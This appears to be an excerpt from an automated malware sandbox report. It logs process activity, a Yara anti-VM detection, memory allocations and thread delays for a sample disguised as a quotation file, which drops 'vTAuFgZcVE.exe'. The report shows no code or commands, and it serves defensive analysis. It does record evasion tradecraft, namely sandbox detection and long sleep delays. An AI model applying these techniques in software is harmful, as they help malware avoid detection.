                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: QUOTATION REQUIRED_Enatel s.r.l..bat.exe PID: 5748, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vTAuFgZcVE.exe PID: 6752, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeMemory allocated: 24D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeMemory allocated: 2690000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeMemory allocated: 4690000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeMemory allocated: 9380000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeMemory allocated: A380000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeMemory allocated: A5C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeMemory allocated: B5C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMemory allocated: 53F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMemory allocated: 7370000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMemory allocated: 72C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeMemory allocated: 24A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeMemory allocated: 2610000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeMemory allocated: 4610000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeMemory allocated: 8E40000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeMemory allocated: 9E40000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeMemory allocated: A060000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeMemory allocated: B060000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMemory allocated: 5500000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMemory allocated: 6F10000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMemory allocated: 5560000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599015Jump to behavior
